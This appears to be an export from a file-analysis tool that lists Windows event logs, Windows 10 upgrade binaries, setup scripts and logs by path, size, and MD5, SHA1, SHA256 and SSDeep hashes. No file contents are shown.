\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx	68.26 KB	MD5: 7cf9c2e95cabace8f320b4069ec88825 SHA1: e2dc774376e31ce51fa1072c71d8a483b3800f5d SHA256: 97eabca026f2a33f7fde4eddbab4df9d9594de3d7fe7af00f87a423b05438530 SSDeep: 1536:qeAgAW7JgpT3kEpQJclVbKDc3G0xA3Gi5pBEw0xhAyJds58bqh:PAgA/t0EyJcbKDQA3G2TE2w658+h	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx	68.26 KB	MD5: 6b354eef262d247aa69f263688dc3558 SHA1: 95e2a13e75d88f762515d1d121025118696dd79c SHA256: f0a004545ef07535430e122d52e95add0c7a3f0bc286b383fdb46d9b0f12dd1a SSDeep: 1536:VbbeoZhq/k7w2fRUTcRSat4pkZ7Dch9ibD:/ZuokTcAO+2Doi3	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx	68.26 KB	MD5: e9a7e7f77d6b4a2506d7b826dd4c350a SHA1: d46a9b9a0605f2d12f96de49762444bba244f9ab SHA256: 4b89ed33d7238d7224d6677380e6ff36cbdb802e40b8a93e9fd84a3fd71e6175 SSDeep: 1536:Et53eg5G3vfFuErQcbg0nou9XdUkNLc4p36LN0aE0aBw7K:Oh83vtuWQknlDNLlgps0tO	... File Actions Show Properties Download
\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx	68.26 KB	MD5: 6dc7cdb48c490a3f14b4155a2fd84e5d SHA1: 2b986400fca3e0494ff55cf9158a8234ea54b01d SHA256: b938e1a91886edd35eefe3b7be0b4fa0b2ca92532f2f0472b0fb9afa069cc80d SSDeep: 1536:QUhCAVEP5rFD1mZRSAQOUMhq+X3ov033EMI:SH5Z1VPqhq+IsA	... File Actions Show Properties Download
\Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx	68.26 KB	MD5: 0435772ce119730bfd53def893d27547 SHA1: c4003d2b0fb285fa462ee8c2ecdbc8eea340623d SHA256: 39bd365137d318f0b6e1325e381c736e3312b1d92d4f165cc14371f7a3a5990d SSDeep: 1536:W+4OaXvxYw6nKpjeKN3g1joa5kGlquktfE57CvuZK1/p:Wea/ljjeQQ5oTGlVefEBeX	... File Actions Show Properties Download
\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx	1.00 MB	MD5: 16c1fa658e1bb5c8d9794ba3890d63ca SHA1: f9ab5f1b041a07065b4c3665c385d45d3a80c2d7 SHA256: d7ed80af1b7895e8a441815d5b35d4f0c1a91578f0a23a2830b7bdd338fe8c07 SSDeep: 24576:K2cJCEip7NZb7NlTKsaUN5wUSFI0A30niH7:K2c1e5ZbaVUuoE47	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx	68.26 KB	MD5: 23e6d00ae66e988a1a3737fb912871bd SHA1: afe628001f465e8f0555fd301c84548c0f346743 SHA256: c9ad6896771d612e17d35d02ef2c9ebe0d96eabfdabdd43d493f31f50a16cdfc SSDeep: 1536:1c8+R95rl+LyM3xU9fCfpEjww7Uwe6gE7boJSBQ4h:S8+lloyMBU90pGww7BewbpFh	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx	68.26 KB	MD5: 614328e3e24ce5f2a9995613c1e8b759 SHA1: 54dea9b5d573af8a11870dacc777a9323b12193e SHA256: 47e60bc65ef9b4bdb9784da0ad5ceb515f2ab62376f75f8f43e1dc1bc50365ff SSDeep: 768:hNIg0ebhlrEsq9YRZXpGstoDqyoFmAxoEknjlM+VsgTt+bjS2Roka+K9bGpYSib4:hNRj3wsq9YlpogmWyhJV6SlKK2CGSOf3	... File Actions Show Properties Download
\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx	68.26 KB	MD5: fd1a6623cc96f53a68348e146a9af918 SHA1: 7bfa55e267e535d834391d71617bda360ad037aa SHA256: d4a5061ca822b28450ccca5ab48dc481d1c31cc65c85485aa7271adb9632f883 SSDeep: 1536:KhoBhSS+e/cfxHJWorMNG0wzqooSXyb6Y1MPVALiskCKRYfpSaJGC:haXe/cfiV1wzqooyzY1MsPkCoYR7	... File Actions Show Properties Download
\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx	68.26 KB	MD5: a95efd2c845889992b74e8cad953dbda SHA1: 0ce2b69d57ab35775e0abc909228839550ea91e6 SHA256: b51bb2838857b4ade4de2dc433203fdc07e68c893ca285bfa863c30551e25c7c SSDeep: 1536:FwnCDCRnF0mXk3xain8c72OvfurZyymW2fD2U0CtRCqiFH+2upq0gbm+f:4CDuF0Ts68c/WGxyUV7CPFe2upq0kf	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx	68.26 KB	MD5: 3f716c23ae271e8b36886f87d55d4d75 SHA1: d2d12c9348b8316e93b43f765d0d36331ae67d43 SHA256: 87b866203ffed689469e20f53c48be4d805b98d27f8aeb49b89a75ae7892909e SSDeep: 1536:rQLzYOGbsPlw1dvXgM15aRe+nVMXaX1A+F4ha:0L0O5lw1dvXgMX3aJ4ha	... File Actions Show Properties Download
\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	68.26 KB	MD5: 0824b2124ad5221c9f61b609c58599b8 SHA1: 1fe8ca37f94ab6277584ca45f22d416fdb814149 SHA256: e723afaecdc0e44e22fa8d9e1edd00725de2f3905fad942acbacf2f2a7f49558 SSDeep: 1536:YNhFJCtMOnQ14QxYhvERKMYVDPVWsWC/mn:YN/JbaTYKTdVWY8	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx	68.26 KB	MD5: 48cbe86c5b838f0be8df4f47889c0f84 SHA1: fbab89148d558d7248cee81899bdddc8aad9491a SHA256: 36e390039b3e73f9c341048bc6486ede12af0396f31050578fd51bc6d88d7d54 SSDeep: 1536:kVGDU9Ma8ueW/7a7kU10YQqgaUY7Y1zFeRAisd9:kVL8q75gCaUY75Abd9	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx	2.07 MB	MD5: b9376b9a78cb53c14aa346b7a04656d1 SHA1: 85a67b0ca5d4f615f68a557472a8a208c16f38a1 SHA256: 522e99a4e1bfe2c2e9283ecdab954a90ec108be91d95af6f1501ca2b04b37a37 SSDeep: 49152:/+X3VzFVEc65r+UdAXv/RUES6FgQJj3nS8sT4h4iTKEu:/uPbaAXnRUEYQJjpsT5r	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx	68.26 KB	MD5: ed8e48729fb0ed79847cc6a091182cc1 SHA1: c2060368cc2eb2e319e991acfdf1ec08c000307e SHA256: 036ef166d96da9133b52636e0aec11079c97c8629600ec8c969b61ee655a806c SSDeep: 1536:SzjY7pGgztCVuJgxqCpOXseWANKJWsSvrECHC3mX8KS8CrB:S3gpGgBJlDXse13sCS3mMp	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx	1.07 MB	MD5: 09bfb36af63ef2510f63e08796f60f61 SHA1: 1573944eba178d64d944839004f6f31627013b98 SHA256: cb16245ec40a0b5ad7715296411250be1586a1cc2c3da53032c32bcf82898ca3 SSDeep: 24576:HO7IeX6aF3qGzEkmQYAX9e+dP9GVQTT2cPB/PSlDtDiPLKNzIW2:058GzEkmQYAX9e+dVSQXbByNtDQL0r2	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppReadiness%4Admin.evtx	68.26 KB	MD5: be97955f5049fa32a40bd62dd14bcd99 SHA1: a86245ecdd06eaf9b48188cbb44772967c98544d SHA256: fffacac0a9a922af03c383464cd7cc17a2d3cffe955c2621b1613b4f107dc697 SSDeep: 1536:4LXrvoCXx/K+ni0QNbQN38c4ZaQ8XTYZBySqlJIce9h9q:4vvXB/9nENbGVMarYDnFL9q	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx	68.26 KB	MD5: 61386b47ab9f5a0b0862bcadb5c7ed79 SHA1: b0ea3d4a8cb50af7cd3371302d37372901e92a24 SHA256: a3ba0b1b1d5c1ebd8d65eaa192789a4e27aff06139737ec355a52212c9ec4589 SSDeep: 1536:snK6OfGJMlUrWHfm3T91JJVBP0owARPHJI8m0wG3jhI2fjvzJ90mR:snK68LGwfqBrBPVdH9wG3rBemR	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx	68.26 KB	MD5: 5dd9ab9f440d476a7d16604c4995ee9c SHA1: ac52ca67a2265eff998c2162e793e746c6fac38c SHA256: 43ab56061302675cbd57367fc8354b20323bc4c190f51dd094c07819fbb06559 SSDeep: 768:iLZbUYV6oSllj+bzVwxbY+RbBeCgthR7L9EPtffcXRMJRy8qZb1Ii5H43irnlNk0:6Upj+bzVwVTRdeCg+MSurb1SirnA3R6	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx	68.26 KB	MD5: e237aec557632fdee60f48d952c70d89 SHA1: fc2c2a17d599c1403dba370fb55b6425fa8befad SHA256: 6938634416bab5ea6630a3b6f8a1426283d81b4b68cbf3a100a709f6265ca618 SSDeep: 1536:miA6cCz4tbtfZj1ZEwruKQlth6ln1r1tCX5PjG3naKDy:2cktB91ZTrj88j+Mnb+	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx	68.26 KB	MD5: f142990ea31ce392a19d1f5125ee7918 SHA1: 653ba0649bdabe2f78fd4c9650e25a96e5bf7303 SHA256: e2ceb5a0a1ee58e96dd0a38f63e29d649ed74dcecd75d25149e839a58c4edcdc SSDeep: 1536:lcXoEbddGj8aMCb/YWOjpTj2Ex7HxgjeOH2L8ZEX9oaZjYVB/WrSg2:lfB0C7Y/X2WR/99BxYHoj2	... File Actions Show Properties Download
\Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx	68.26 KB	MD5: cbe6f76658823cc211095f8c1d6f46fd SHA1: 3f773b072ac85c73d10241f020733756dd4374e1 SHA256: ce6b5d55954055f1e768b105e0275e1d12ffb5adf542d5a833297b1c54f833e7 SSDeep: 1536:7J2zNJzFI5Y0qSce3Wju5CkJUph/vQYlug3k1ZJnWw9qJKo:7Jsfy51ce3Wju5b+pZvjlmZoJv	... File Actions Show Properties Download
\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx	1.00 MB	MD5: 0bb33d598d4d98b7c4085e968bed5195 SHA1: bbc454b6a121b64933ab6fa250aa497f24f305e9 SHA256: 8097e16d94b131d7e4f3828557d0fc611c0354545ce4259491d866623ba6bad8 SSDeep: 24576:5owYe9L2vqkZsrkQuEzWX6xMWwwSRIgANhes7qXaa62/Fzeb:5owF2lGrkOCQJpC0Nhes7mV62/Fa	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	68.26 KB	MD5: 3a18dfbdf8bb91cb357c777ed295d1c3 SHA1: f067b49f031c15b60605ab24064c088756f3300d SHA256: 7758606133de32be5786c1a02f3c2bdfb6119d4d894e67df983c50be915f5c11 SSDeep: 1536:1jStasP8fS/HeyQA1nVdV8982W5wmeeO5LXwWwW9GbhXCR8IlfI:1jeasP8K/HeyNJ32WleeO5Ld9GbhXCCp	... File Actions Show Properties Download
\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx	68.26 KB	MD5: 24b2706beb534026553d342de7ec7494 SHA1: 3334a6e72d2b72d922506a9fe000435e384e0134 SHA256: 5c2c15f94ec928aff2b47a338ddda63112890450ce450b0991efbea59f5a44d7 SSDeep: 1536:63SquyOMcc1uQsWOOgeoHv/5KP9SGygyk9Ggs5Ja52YK5pf:ySquHMcc1ua+F/5asGyPCGgCaDkpf	... File Actions Show Properties Download
\Logs\Key Management Service.evtx	68.26 KB	MD5: e8a432ff1835b5b2f00b7d12271f0313 SHA1: 035c2e2fcffda2c115267166c2bb9c4c4f337d76 SHA256: 31b30dcdc89d4af273bd032be6b42dd382ae44150237878b7e329939501d3cb4 SSDeep: 1536:OBPdd5/tuci+k+pKZ7FbMOywZMpdf2vt3PHzifqS6J03iYK2HUD/:OBHPiJ+gZ5ZzWx2vt/zifqd8K20L	... File Actions Show Properties Download
\Logs\Internet Explorer.evtx	68.26 KB	MD5: 72c37c316527aaa9b989f3340384a578 SHA1: 0e3840330594c8717bb80b05d26929c8cfdc2f2b SHA256: 01db0ae98214caccde0fff41df26aa16bc7313aaed73623aeed280674205df06 SSDeep: 1536:hmdYuxkgXQwTXr1rG9HpxXdXMEMw7fWHEohj5gZ7+laguLRMGDv1:MdYuFX0HpfI+yXzgN+lVuZDv1	... File Actions Show Properties Download
\Logs\HardwareEvents.evtx	68.26 KB	MD5: be414886d86a82da5c43f0992c3f63a2 SHA1: c760dea00495c0082c3e0954edc9755c4a972624 SHA256: 6e36e87468319a0138a970fca4afb965dd040cb6992d4838dd089d95e2914faf SSDeep: 1536:P7A6Yca4qxUPArOnt9Iep2HCh2QJu4Pys3vKszkIT1WstqSS3:P7Nzaz1g3Iiuy2QJu+/KszkqWstqSS3	... File Actions Show Properties Download
\Recovery\ReAgentOld.xml	1.24 KB	MD5: c2d5f26ead117367224a590d290a7996 SHA1: 3500ced789c6c04443c6563d12f51242a5ea279c SHA256: 9e7f05dd800c07ca395b6df98ed62edf21a288a702c3d9339115dea71cce4b82 SSDeep: 24:LAYC4vK246ABdZxc+unBh7kJvg23XW4kbBDksb9MiRUjoxUEfpRfJ3ow:xif6ABdXuBil/iR/9M5joxPpx	... File Actions Show Properties Download
\Users\desktop.ini	438 bytes	MD5: 69258810a9de8b9639c5253d51040f04 SHA1: 1584263c2f4984973cec452e2ce776890abd6703 SHA256: ba9a03e3ffd5cec55afb2533aa82756e919b4d5fcddb8fa166b332a590cca98d SSDeep: 12:Y2AAUnglbdUGSzJbwx7/pxTLeHRRxUWTXfKS5JOx6:w3niNSzIHPexLUWTSvx6	... File Actions Show Properties Download
\Windows10Upgrade\WinREBootApp64.exe	25.45 KB	MD5: d505e8272884245e2b9276644be9ce9e SHA1: 8453f2913bac2101b7d77d5f2898cdb1c1a17aac SHA256: 275b3974aa445c80a286a224a54f92eb4750964b11b6a6e38c47fd97070bd9a7 SSDeep: 768:gvyHJ+P2dRYZkRQw/FlyctijiQHq2aUigh:g6HcP2jndFlycYiQH/Hh	... File Actions Show Properties Download
\Windows10Upgrade\WinREBootApp32.exe	24.95 KB	MD5: 2a77e59a0e6064d98a14336db7514e9a SHA1: 207060a7bf7162b5932548215448cf524d966584 SHA256: 2dbba40ccfe9e1bc3f0a7cd6638443f9108fe957dea1b80aac161433063eeaf6 SSDeep: 384:KdDoqu7UCkT3r/dn6bZdQoc4Z6KE1T+jxHHmx6fXnjl1rlHS7nFWiq/1rV:Ku6T3r/dnMHa40f0jkx6/jzs7OT	... File Actions Show Properties Download
\Windows10Upgrade\windlp.dll	894.45 KB	MD5: 159e60cb669ff67219a2cefa95604266 SHA1: beb25cee234980e1eafd1cbefba24c606cd109f4 SHA256: d958cf23119f7f8e899ab2675e9f6387f63eec3a9ef05c4219983c4f363cef47 SSDeep: 24576:FnW7KtqQIsjfhHAfGIhmdRBXPs24XbdLj3wl38/:FnWT/lhrlbljgpU	... File Actions Show Properties Download
\Windows10Upgrade\wimgapi.dll	544.45 KB	MD5: 5621f6f67b99e3baa92c172b3ad66199 SHA1: f9a905c699b5c531f377bef8b914ebe3497340ff SHA256: d04bf732aa1ff1e411369c2bb85b9e998820f54aaf425c9dca3ceb2065fb66ee SSDeep: 12288:M1rufbr82smawbQcCuDR43I02shLXREZSNklg6H69CR5Zg9+W:S+bI2JbQcCSC3dlREc96H9g	... File Actions Show Properties Download
\Windows10Upgrade\upgrader_win10.log	20.32 KB	MD5: 453cc7bcf4aea2eefd03420426222580 SHA1: 5318a9e45e5a9c1ee8f14a287707f66e41ff9484 SHA256: d28a7f29f98537f4632d1b31bcc75bf5beed3359996d8ee0b54fef509523329b SSDeep: 384:cFUdl1mDbdlrqoB5p0dXE4moU6R5jG7lp/U4XVt3MqF9XSw:ccQ/dlrTHy8oU6R5clp/tFiq3XSw	... File Actions Show Properties Download
\Windows10Upgrade\upgrader_default.log	244.58 KB	MD5: b149585cc3062acd5e0186bd715ea446 SHA1: 3891f939440da861d04dd1b574f7911f3931baaa SHA256: ccf956148684c83d7ea863107840e3528ccc6b91c487b4b5ed090ffb0787323c SSDeep: 6144:EYwCViGQVDjQdWfZW+xhOyZ+Ybh42kSpsst+IsTdacp1C:ELCXM3QdKZWmndb22kSCGidaK1C	... File Actions Show Properties Download
\Windows10Upgrade\PostOOBEScript.cmd	841 bytes	MD5: b4c68dec783ad401001913a9f22f4b16 SHA1: d5cbb0d358e952a7941906ed1677d1a6a2d5fd4d SHA256: 3d29c9ca6bca2826a6c9e1da12cc2e49ce7ea1e0fac321490f9d9feff5d25daf SSDeep: 12:dJI3Ig6jKttUKWsWJ5a/YxQQNTc+vQK58tMShhean2TeUCWZEPh:dJI42tCKWsO5q2tH/8AniUDZE5	... File Actions Show Properties Download
\Windows10Upgrade\HttpHelper.exe	27.45 KB	MD5: ea59c12582cee88690f933335bea1942 SHA1: 6f0e7840ee174ca72b2a14cee6f15b96f7679518 SHA256: c9e162592a48320249551f42780ae5307308ef4c6baa5b6ba309c6efd3694494 SSDeep: 768:VuflsktBXCtzCA1TK3J8Es71dl9bh3vXg7:/gt+Caosbo	... File Actions Show Properties Download
\Windows10Upgrade\GetCurrentRollback.EXE	71.95 KB	MD5: f687f4096e110843ded655333a62c0b4 SHA1: 06b7560a5ce0f88b70d380f0c63c4d618816e21f SHA256: 538d451bad65995bf1eea6d1c95a346d1e2f847a7d8c69624156ec0aa5cf26d9 SSDeep: 1536:ySWIodj0qIZbj+3seZonnnU3Cw5B+dPl7RoDhlh4ALkeFZw7nQIDuJ/HeGI6LX:rQqba3jZonnavD9lRLZ7w7nQCuZvX	... File Actions Show Properties Download
\Windows10Upgrade\GetCurrentOOBE.dll	140.95 KB	MD5: dc0baded3ed2b5b63478af5c5d9da7a3 SHA1: b212b844b18e6a99168feb5f2f1e514dcdda45e1 SHA256: 9d225e10c48c718bd29378b228df6c9fa45b6db33494fa64ac3407ad44596386 SSDeep: 3072:YxpQuJQylMuqUHQFfEVPD/k4TiQ81/pPxVWOp6QIMss3RVMOD:gQuNiUH3VjZ8bxVfnQqXZ	... File Actions Show Properties Download
\Windows10Upgrade\GetCurrentDeploy.dll	527.45 KB	MD5: 81d1c3f32e9d1a62febaabae71a8f3eb SHA1: 4c2a106526b9a91923eaad478565acd6f0e7f783 SHA256: 3d1e44c9aa1535b31195d00fd6508049ba2ae4d5278e7240818f38d80ed087a8 SSDeep: 12288:9Es10dgVEOnWygF0T3X/g2HZ5+eCh+07RJMVFuxO:GZWEc8Y/JZHu+0FJxO	... File Actions Show Properties Download
\Windows10Upgrade\GatherOSState.EXE	551.95 KB	MD5: aaae38c41e120b7bb44f94c3bb4ac930 SHA1: c252d7fae6ad256ca983e3bbb406639c15fc99db SHA256: 88b4a684bfca20008cfe8bf82d0b2dc90486873f9a07b031748e08400b691ce8 SSDeep: 12288:JeZwgFdoShvNZm7oRp8uE4hmJeF8YC7gyn/yL9sCJ1pjIJbZE95Ygt0KuD:JKdNN9pEamJLl7jng9sWabZEn93uD	... File Actions Show Properties Download
\Windows10Upgrade\esdstub.dll	39.95 KB	MD5: be0db6d308d7ee6f5cf84dbcd6a02421 SHA1: d383b3145c47ec45dc970c21394e603c37686cc3 SHA256: c32a1c563d87d58db8aa2efd7322731195c4f5926b9754d09f9ff380ad4e3e70 SSDeep: 768:h55Iuwtn25JeukchkjBVskbs+tECUodJCvSTJEt8njEoFVxKSidYoy:hnIuwY5ZkP9VHsFP+CvSlEKn1kSiM	... File Actions Show Properties Download
\Windows10Upgrade\ESDHelper.dll	67.45 KB	MD5: 9c2714b0cb7b040a3980ef829590d480 SHA1: 90d777e55d59548695ca0c5bb4024d8a0bd6ae23 SHA256: df482ef38e833ff3cce3ea41434e595f7f5caf2845fd3eba0e1e595e957f982c SSDeep: 1536:tavnhKOC4ZumD6TXyuOXR/1xbYUHXW93S9uFZi8eXqqBKDEmMAV+zbR:IsOC4ZmyuOpDbYT9i9+w8Klp	... File Actions Show Properties Download
\Windows10Upgrade\EnableWiFiTracing.cmd	9.84 KB	MD5: 4625f7669f0d01bf4f1cae0ea122ca21 SHA1: 0c41fe55ffeb205c9e4add10c491d0513df91120 SHA256: de943450b4a0b3d13c50434fa8a21c0b1b7b7e041a9c817f263fe16093a8dc55 SSDeep: 192:DJIXCwMyrpVrLGMXfcDViM5GTHyEnnWyfy5qyDKAtcGwe45k3O/SK:DJIywFVVrgd5ajntfy09Gj4zZ	... File Actions Show Properties Download
\Windows10Upgrade\DWTRIG20.EXE	44.95 KB	MD5: 894f9b3879d7edc8e964febf99425fa5 SHA1: f997295f9251b6684e85e0e6b9cb9eddb597adb1 SHA256: 4e79b4baf7e3a73289646e49bdaacf946b32f68c1bacd098cbfccc96f5f09db9 SSDeep: 768:P/CmmL3bJvBFhoypmfZo8/kKYzdxggq+V0XRQiAfx8qfiOHIyLzGISycgbuzO:7mJy2melpz77VNiAFKOH7rSJxS	... File Actions Show Properties Download
\Windows10Upgrade\DWDCW20.DLL	48.95 KB	MD5: 359fa60888162c7a80f8c66dcfd7f698 SHA1: 4008ad101814d715cc0b7e46bcf2b5b0b1696fce SHA256: 1526af642994748381a8d862851aa1f87f67e9d5a87cbc69b2fa1f62f9e990ea SSDeep: 1536:eET5g1cJc1Eq++QZmofL9CLIjY/57X1qhuS09iHLn1L8:eENMcJc1P+Osi7X1qhyCL1A	... File Actions Show Properties Download
\Windows10Upgrade\DW20.EXE	628.95 KB	MD5: e63c20627b55ee2757da68566f53490d SHA1: 026cd8475e7ca9bfda7a38edb8bce05e9d029ec7 SHA256: 4b0b4d691308282978fbea5b8769cae29233c18bd23f859339e9b8f28ae3a753 SSDeep: 12288:nGtphGZIBDyiLdl+q2q7HRQxGSWDecLQXY292L4MCR+cmDEM5qy:nG9GZIRyA97xaG3icIYz8MM+cmDEM5V	... File Actions Show Properties Download
\Windows10Upgrade\downloader.dll	201.95 KB	MD5: b4954052a0cac4cff94b7719ae8fa03d SHA1: d156601c566d1f87e257afc55460182cd92a4434 SHA256: 86c8d4f5a3421ba060bfaefc5125b655b5f5ce0161e170179601e718f5d56f50 SSDeep: 6144:SMyyc72x2Dtd+AK5Ye173+zdOPTMm7WlvQqA0pEF:SMyxVDtdbKj7OB8TMm0vDEF	... File Actions Show Properties Download
\Windows10Upgrade\DevInv.dll	322.45 KB	MD5: 3ae480cbd9e3fa1dd2f5e4b9dc95636b SHA1: 5d39209c057cffc01db674f51ae13647f74b0589 SHA256: 8f1bff751dd1dea6c659b40f35fa742e0b67373fd402ebe8deeab7feae39431d SSDeep: 6144:7HjjGUEq2aA3Uh4Jf8ScVBlbHtMrRv3rJvK7M9yHi/bq8oXGjtt3uH:7WUkx3bJUSGBKrZ9vh95/W8oWR9e	... File Actions Show Properties Download
\Windows10Upgrade\cosquery.dll	60.45 KB	MD5: 8a2ca444af7886fbd95dd1925feb451c SHA1: f7eca2a9b2ae2e2f66bc61605200c8d108f23f98 SHA256: d640fbd7c88fb0430e33c4b3f01b328c5ccfe140bdd5d7265076dffe2881b59b SSDeep: 1536:Zr4hKd2Rm4diOJjwWs+fIKqLOFaGQrkJzv0eTPdMXh/1wKxx7yZdP0l:V4sMm4hJjt2LOYrk1TC13kKl	... File Actions Show Properties Download
\Windows10Upgrade\Configuration.ini	476 bytes	MD5: 18ffb620a481c21e2a924234e2236d4d SHA1: 213954fe710c469a939b96e1e24c8f3542b31fdf SHA256: 2371120ac8eaed29b211230ced8d70c9cd85ba7d89a71af79ffbbc0958a2d447 SSDeep: 12:5POA5TQ9Ci5gjkpuIr/tyejlwzAa8ZnA1+B/3:EA5Uu52FyepwsdZn043	... File Actions Show Properties Download
\Windows10Upgrade\bootsect.exe	115.95 KB	MD5: 839f1cc655022eadd682c501ffd0ed05 SHA1: c61a98c247d9d6b9a27b9a8051103504b89e522d SHA256: 6a016e2294ba9bb47de5155f19ed41875a6980ace992532b4ce2cfa5f3ffe5e5 SSDeep: 3072:4PDlPfg2cqYpV3EpHQB4hUmD0raiUA+odG:URFcq4sDiUf	... File Actions Show Properties Download
\Windows10Upgrade\appraiserxp.dll	449.45 KB	MD5: 34489df4e5add42b35ec9e009f64f23a SHA1: a7d4658e012fb979aa3707e464905301cdfd1aed SHA256: faaed51294685ff99442b846ea4638d60a8b55b22323f36c31a25d277f678f0d SSDeep: 12288:hnvO5dM59UN7ewvUSB4rn3Tv0kWOHfC66/t4WdHlj:hnvO47EqwcI4rnDv0kWOqteY5	... File Actions Show Properties Download
\$GetCurrent\Logs\PartnerSetupCompleteResult.log	304 bytes	MD5: 4cf05a84801a107fce34b9edd6b728a1 SHA1: ee1a64d4ff814faa8e9e6ae46762016117e1806f SHA256: 46c4b41bb8e506e2e580c772ae3cd822269bbe8a80d3fc5e1f7c95c981a0d699 SSDeep: 6:0UnYgNaq75iqPiPA3A8Zhr9OEMPkLQcSFh6plxE0zyGgv:DNPjZbhAHkz2w9E0WB	... File Actions Show Properties Download
\$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log	6.12 KB	MD5: de5960698f39e09d8211c6add1322fe1 SHA1: f95b4595963f35e6da25dc8097fa6561c5d6a7ce SHA256: 34382f5b4d10b9f933d905ddb8779969194bd13b1b4db7948ffc3e6b38de7e43 SSDeep: 96:qPGWb5R8zPzvkue5gyts2YMU6gSPTplrtZtqA5l3D9mKyW7oJH4BuoKdD/:+R83beDtsSrp2uBD9Tzu3F	... File Actions Show Properties Download
\$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log	41.93 KB	MD5: 4bc3a92eb0f5a9972d220998c8480a26 SHA1: dab87df7c0f254097c5b84f2b4bc388de1b6981a SHA256: 3b1946f22fe4625b03f68ae827e49791c63d1c5fe190c86265f9291b078d77ab SSDeep: 768:BWl8mYpHvOSFav867KsKzne9p+qDwPd7InAcDw7htwJ3S69l:BWUH2Nv8cglIVQtwJ3Skl	... File Actions Show Properties Download
\$GetCurrent\SafeOS\SetupComplete.cmd	571 bytes	MD5: 8c8c5d335ac9a7bf6b870b01b5f05170 SHA1: 26c3a0a130831258aca626296541a2e0c25008c1 SHA256: f8b5ea7eabba2dce6ce1124d3e006c703904cc71642ca80c42c2b94b935a1d9a SSDeep: 12:KoWxYdLYvzF4FZ1w6I8XhGa9tzYxN6bg7QgfEVuE6xYFwU4m:VBL+FOwl8Xh9zYxqg7QMo0u	... File Actions Show Properties Download
\$GetCurrent\SafeOS\preoobe.cmd	338 bytes	MD5: 4ef3cc3c3030366a86e61e8c65282634 SHA1: 1d351559271d9774b4ab84aa33c3818745796ddf SHA256: f371d6b1af6992c26e33448390fb725e478c9e7a19ee07f0480a1343fe833c68 SSDeep: 6:+TZI3qBXf12dQXqyd9VyJoi/HzUnQzQQas25knyxjAMuTXduTPun3n4:+26BPEMbyV/T8QzQ3sV+8MuzqPo34	... File Actions Show Properties Download
\$GetCurrent\SafeOS\PartnerSetupComplete.cmd	841 bytes	MD5: 1d8fc1733a3a0122537b045529643bcf SHA1: d4b7fab7709d6dd388f2d4c944d16f5de8507f88 SHA256: 779b8eeaf95c7a692e0d883a4b2578ef003cf9f480e975100f7ef2be3c20a403 SSDeep: 12:I9xFlgRuaLQ5+nmSB6qaRO3buOrrEw4KgZCidTi6NuIww83ove/7+a8b3ZtKgo:ILaVLQ5+nR6qaoNkldTi6JwpYWT/AKgo	... File Actions Show Properties Download
\$GetCurrent\SafeOS\GetCurrentRollback.ini	420 bytes	MD5: 4dff6cfc8d83e47a327c2d01cbd1ab5a SHA1: 201f8422ab82fab65a7862863dce015fbdc9b938 SHA256: 8d9e59cd637c86d07c605da397b2cf2aef74ad58b629a725481d694931f07f22 SSDeep: 12:iAoTNjEeSGp2l2cWP6S2UVhJN/9BUmK/J+w7X:iNTNQ6gl2RP6S2ULJ1AFr	... File Actions Show Properties Download
\$GetCurrent\SafeOS\GetCurrentOOBE.dll	140.95 KB	MD5: 638fd3d87c733dd4332c6bb3ba79ac7d SHA1: 0e5d85ce3f6b3386e4bd42b3475afc4906500c81 SHA256: 3f4ea39da18831c9e7f95df0a68b2e9099d53280805737340cfcbce398c30c44 SSDeep: 3072:Da4LGki4iHKfBJ1LhHcPqkWtV462hPod+mmupoY8/ZyzXl1:D73i4iqfBJ1OPqVtK62doEupoBBSXl1	... File Actions Show Properties Download
\$Recycle.Bin\S-1-5-18\desktop.ini	393 bytes	MD5: 3d788737e59eda3cd671eaef0ce73388 SHA1: b5b19c4a48ef63b282d4e26e848b73c661cd90c5 SHA256: 6a2d494618f03efce58bc879f51cf8b7172df9f14bfe5d935bb3d7a4af7d2bf7 SSDeep: 12:0MGZnIY4F9dYZJOxFwPUdRBgxOQuQiZXjLehiL+QR5:0MGZnIYqkLOv1ROJuQuq0LNR5	... File Actions Show Properties Download
\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini	393 bytes	MD5: cc1d1102639b062f32507017d7e4ea8e SHA1: cb859ec5bae678ff8a2cb79b7c41d7bea1af4bcb SHA256: 19f09db74217f53b1f5e3c6ace154b91550fc4435123177fafd6006789f805e8 SSDeep: 12:rTr8gOG6YU9mogfPyTkPR/330pCXvMdxxU:vk59mNfPyTg3LXvOE	... File Actions Show Properties Download
